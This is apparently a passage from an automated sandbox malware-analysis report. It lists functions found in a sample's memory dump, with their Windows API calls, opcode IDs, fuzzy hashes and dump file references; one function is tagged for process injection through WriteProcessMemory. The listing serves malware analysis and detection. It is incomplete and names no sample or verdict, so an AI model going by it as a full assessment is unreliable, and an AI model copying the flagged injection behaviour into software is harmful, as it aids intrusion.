                • Instruction Fuzzy Hash: 334126B1D00104AFCB11EF54C881BAE7B74EF45304F55806EFD495B352D63DA94AC7AA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FD8B0, Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                Download Yara Rule
                APIs
                • SystemParametersInfoW.USER32 ref: 003FD979
                • FreeLibrary.KERNEL32(?), ref: 003FD98E
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FreeInfoLibraryParametersSystem
                • String ID:
                • API String ID: 3403648963-0
                • Opcode ID: 1e547b1a1c5263f34e673c43badc8a112b0b527580b00e9734e8ff54b19a115b
                • Instruction ID: 52c413b5473b29c47fb8af885b62addbd9a8643adec17ea2c39327e18e6bce84
                • Opcode Fuzzy Hash: 1e547b1a1c5263f34e673c43badc8a112b0b527580b00e9734e8ff54b19a115b
                • Instruction Fuzzy Hash: C9219171908304AFC300EF5ADC8591ABBE9FB84314F40493EF948A7262D775E945CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F3C80, Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _malloc_wcscpy_wcslen
                • String ID:
                • API String ID: 245337311-0
                • Opcode ID: 1fabcad87247a5ef280784cfa2092aecddaf921165ba0e5cecdf27b871339c49
                • Instruction ID: 9f6e17cfb72b5178f07f6b7cf5739278c33f974883667f8d0a28104da2396491
                • Opcode Fuzzy Hash: 1fabcad87247a5ef280784cfa2092aecddaf921165ba0e5cecdf27b871339c49
                • Instruction Fuzzy Hash: 291163B06006449FD324DF6AC442E26F7E8FF45318F04C82EE99A9BBA1D639E841DF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004007A0, Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,003FE094,?,00000001,?,003F3653,?), ref: 004007CA
                • CreateFileW.KERNELBASE(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,003FE094,?,00000001,?,003F3653,?), ref: 00416296
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 45f9c9521eb4aa204ef864b2ee139a0cac51003bb589642db72bd069afd35889
                • Instruction ID: a2dd48169e4666d9ff1ea431a031f325553069af3a53d7e06ff7cb8bdbd55085
                • Opcode Fuzzy Hash: 45f9c9521eb4aa204ef864b2ee139a0cac51003bb589642db72bd069afd35889
                • Instruction Fuzzy Hash: 48011D30384700BAF2352A289D4BF523664AB05B24F244727B7D5BF2E1D2FC78C28A4C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F16A0, Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003F16E5
                  • Part of subcall function 003F2390: _wcslen.LIBCMT ref: 003F239D
                  • Part of subcall function 003F2390: _memmove.LIBCMT ref: 003F23C3
                • _wcscat.LIBCMT ref: 00418BC8
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FullNamePath_memmove_wcscat_wcslen
                • String ID:
                • API String ID: 189345764-0
                • Opcode ID: 58c64d3a7216f21a190c18b37fdbd8fa47f70838d8991889cdc16939aa8e5c1c
                • Instruction ID: 86022d4995be8f91efd8af57d7ce1da256633125b59e90a16c4d0327f3c413fb
                • Opcode Fuzzy Hash: 58c64d3a7216f21a190c18b37fdbd8fa47f70838d8991889cdc16939aa8e5c1c
                • Instruction Fuzzy Hash: 9601A1B454020CD6CB01FB65D985AEF73B89B15300F0045EABA099B241EE789A889BA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404B96, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __lock_file_memset
                • String ID:
                • API String ID: 26237723-0
                • Opcode ID: 9c505d5dbfda930a4cb91ef57cdc2d0db37bc76bbe09040241b5ad6f56ad0ed0
                • Instruction ID: 60e6bbd2c97e8cc0973ba5635ca0920209459cf884c95e8ed144a0237bec592a
                • Opcode Fuzzy Hash: 9c505d5dbfda930a4cb91ef57cdc2d0db37bc76bbe09040241b5ad6f56ad0ed0
                • Instruction Fuzzy Hash: 13014CB1801219EBCF11AFA1C80299E7B31AF40764F00817BF924751E1D3399A62DBD9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404966, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00407E9A: __getptd_noexit.LIBCMT ref: 00407E9A
                • __lock_file.LIBCMT ref: 004049AD
                  • Part of subcall function 00405391: __lock.LIBCMT ref: 004053B6
                • __fclose_nolock.LIBCMT ref: 004049B8
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                • String ID:
                • API String ID: 2800547568-0
                • Opcode ID: e54949860384edbf2c415437020262322f3530470852b92aee291a0b4e721f0b
                • Instruction ID: 191025a22ef276ab817b444af8330c825742ef09f09ed0b425652344726a93a3
                • Opcode Fuzzy Hash: e54949860384edbf2c415437020262322f3530470852b92aee291a0b4e721f0b
                • Instruction Fuzzy Hash: A0F0F6F18017119AD720AB76880275F37A06F00338F20C67FE565BA1C2C77C59029B9E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FD5C0, Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                Download Yara Rule
                APIs
                • timeGetTime.WINMM ref: 003FD5DC
                  • Part of subcall function 003F9430: PeekMessageW.USER32 ref: 003F94B6
                • Sleep.KERNEL32(00000000), ref: 0041E125
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessagePeekSleepTimetime
                • String ID:
                • API String ID: 1792118007-0
                • Opcode ID: 3bdc4396cf6f2a4c2f4c222f949a8715b72687964d421296e2da0f2ab525f6e0
                • Instruction ID: a41332afcab944a1f53b1dec1eb966fd54dc407193b5cdb74f9c3ec9676fc09d
                • Opcode Fuzzy Hash: 3bdc4396cf6f2a4c2f4c222f949a8715b72687964d421296e2da0f2ab525f6e0
                • Instruction Fuzzy Hash: 37F05E3124020BAFC314EB65D549B66B7E9BB55350F40403AE91ECB251DB706840CB95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004015A2, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                Download Yara Rule
                APIs
                • ___crtCorExitProcess.LIBCMT ref: 004015AA
                  • Part of subcall function 00401577: GetModuleHandleW.KERNEL32(mscoree.dll,?,004015AF,?,?,0040350A,000000FF,0000001E,00000001,00000000,00000000,?,00406A35,?,00000001,?), ref: 00401581
                  • Part of subcall function 00401577: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00401591
                • ExitProcess.KERNEL32 ref: 004015B3
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ExitProcess$AddressHandleModuleProc___crt
                • String ID:
                • API String ID: 2427264223-0
                • Opcode ID: 6d878f282311083a0143a4c466456755809111c28be19a943b6f6c546c49fa81
                • Instruction ID: e7ce2d085fa057b752a1addd4f5626a5d842ab594db7ae09084e490cf72cb826
                • Opcode Fuzzy Hash: 6d878f282311083a0143a4c466456755809111c28be19a943b6f6c546c49fa81
                • Instruction Fuzzy Hash: 83B09231000148BBDB052F22ED0EC4E3F2AEB813A0B104039F91909072DFB6AE929A88
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F3D20, Relevance: 2.6, APIs: 2, Instructions: 53COMMON
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,003F378C,?,?,?,00000010), ref: 003F3D38
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 003F3D71
                  • Part of subcall function 003F3DA0: _memmove.LIBCMT ref: 003F3DD7
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharMultiWide$_malloc_memmove
                • String ID:
                • API String ID: 961785871-0
                • Opcode ID: a7bac0c4ad7d6e818098714db70d06b71cdc5730de52d4e16ef85087e46fb39f
                • Instruction ID: 74543e4571ed7205caa9104acdfd74846cfb92cfdcb35921778645f717db0ad5
                • Opcode Fuzzy Hash: a7bac0c4ad7d6e818098714db70d06b71cdc5730de52d4e16ef85087e46fb39f
                • Instruction Fuzzy Hash: 2801D1713442087FE710AB69DD86F6B77ACEF85B60F004039FA09DB2D1D9B1ED408261
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FB650, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9acdc5780371e4791193990e41fe66d4d795ac1b06dd101a3cf0a1903350c56f
                • Instruction ID: fd758821c0cc862c33d689e9816a26e5f3ff828371ddc75931d92f22732e4436
                • Opcode Fuzzy Hash: 9acdc5780371e4791193990e41fe66d4d795ac1b06dd101a3cf0a1903350c56f
                • Instruction Fuzzy Hash: 4931BAF450020CDBD722AF25C882E37F368AF54704B24851EFA45DBB61D739E884D795
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F3130, Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 2eae4172ec03d28fd6846c95708ef8de91dd0103d9694502918e5827d88cd61a
                • Instruction ID: d1693b10bb09758aa5d4aa71a88d2f424dd946170316adc0c8b81426d033552c
                • Opcode Fuzzy Hash: 2eae4172ec03d28fd6846c95708ef8de91dd0103d9694502918e5827d88cd61a
                • Instruction Fuzzy Hash: 78314C71E00208EBDF109F96D9826AEBBF4FF40701F2185AEDC55D6650E739DA90D744
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F29B0, Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 6ac9a0767665f6ec0bfeda2068dbf66a3743561c5da31f046b74c89db8110748
                • Instruction ID: fa79cbead9f5f341002d1dd8c3244551a5bd57d868398f4c7179ecbd47536099
                • Opcode Fuzzy Hash: 6ac9a0767665f6ec0bfeda2068dbf66a3743561c5da31f046b74c89db8110748
                • Instruction Fuzzy Hash: F431ADB9600611DFCB14DF19C481A72F7E0FF08310B15C56ADA99CBBA5E734E852CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F31B0, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: ba18ba674f447a4f6785e750e7c26139a4cdac59acd27a341d68ee3078a95c2c
                • Instruction ID: deada00663a23afaecab6f8a0558f49d48fd6ac1fc37da36270b112bc09a109c
                • Opcode Fuzzy Hash: ba18ba674f447a4f6785e750e7c26139a4cdac59acd27a341d68ee3078a95c2c
                • Instruction Fuzzy Hash: A2316F70604208AFC724EF68C48197AB3F5FF58304B20C46EE5968B752EB36EE51CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FE1B0, Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                Download Yara Rule
                APIs
                • SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 003FE248
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: 9793d7416753b429b7f274079bfd842a354db54448a5d2791092e0365f317fcf
                • Instruction ID: 6afdd503ff83ae0620e511ec09daf98d3415e84f6649dca00bb7eece22b76a4b
                • Opcode Fuzzy Hash: 9793d7416753b429b7f274079bfd842a354db54448a5d2791092e0365f317fcf
                • Instruction Fuzzy Hash: F1316D71600708AFCB25DF6DD88096AB7FAFB88710B15CE2DE55AC7B10E630E8458B50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00400C1C, Relevance: 1.6, APIs: 1, Instructions: 94injectionCOMMON
                Download Yara Rule
                APIs
                • WriteProcessMemory.KERNELBASE ref: 00400CCB
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                • Instruction ID: 950f486a954585e3ea1655decce98536ad4dc9e28007324e22ea20bd0e2b9cdc
                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                • Instruction Fuzzy Hash: 37311570A08505DBE718DF58C490A6AF7A1FF49300F2483A6E40AEB391D734EEC1DB89
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043C02F, Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: e457093452ec88c6797551640912a7f0be563a082b1ae3514646af2ecb9530d3
                • Instruction ID: dbb381374333a2e694f65ca58bd41ce7f473120b3cabee846d1a2a8edff4607c
                • Opcode Fuzzy Hash: e457093452ec88c6797551640912a7f0be563a082b1ae3514646af2ecb9530d3
                • Instruction Fuzzy Hash: 57318170600208EBDF148F56DA816AE7BF4FF44711F20C82AFC99DA650E738E690DB48
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F9190, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 635b89e8457b0ffcfda49c883ed8b8cc25541476ca28d833641f6b62d05e53fc
                • Instruction ID: c84e244647f52e4f5e31f4aed6365c99b16ce0fbffd2a2afc14bc01097088678
                • Opcode Fuzzy Hash: 635b89e8457b0ffcfda49c883ed8b8cc25541476ca28d833641f6b62d05e53fc
                • Instruction Fuzzy Hash: 9211E7B450020ADBD726DF1ADC8AF7673A9AF41304B248C2FE68587E54D73DE880DB55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040F597, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000008,004012DC,00000000,?,00406A7F,?,004012DC,00000000,00000000,00000000,?,0040793E,00000001,00000214,?,004012DC), ref: 0040F5DA
                  • Part of subcall function 00407E9A: __getptd_noexit.LIBCMT ref: 00407E9A
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AllocateHeap__getptd_noexit
                • String ID:
                • API String ID: 328603210-0
                • Opcode ID: 56f0a66f06261921da0d36487a94508e7607bec379be49a84daebcc2b54fde7d
                • Instruction ID: 4df64803bb03c2e4a4d316f58b80c75c4a968fd37a378391676f0dee0063923c
                • Opcode Fuzzy Hash: 56f0a66f06261921da0d36487a94508e7607bec379be49a84daebcc2b54fde7d
                • Instruction Fuzzy Hash: D901F536200215ABEB349F21DC14B6B3784AF81720F19893BE805ABAE0E779CC05C758
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F3250, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 148b919aabcccd2d60a48d8cea8ec6a2c2671b0dade28171448ada1c006c744d
                • Instruction ID: ef037daaacf4bf85342cb08808d5b0c966af25d377bd258fe704a74c7b9790a8
                • Opcode Fuzzy Hash: 148b919aabcccd2d60a48d8cea8ec6a2c2671b0dade28171448ada1c006c744d
                • Instruction Fuzzy Hash: AA015E71200600AFC325DF6DD942D37B3E8EF99744710886DE59AC7752EA36E801CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004430A7, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401546
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401560
                  • Part of subcall function 004014F7: __CxxThrowException@8.LIBCMT ref: 00401571
                • _memset.LIBCMT ref: 004430E3
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
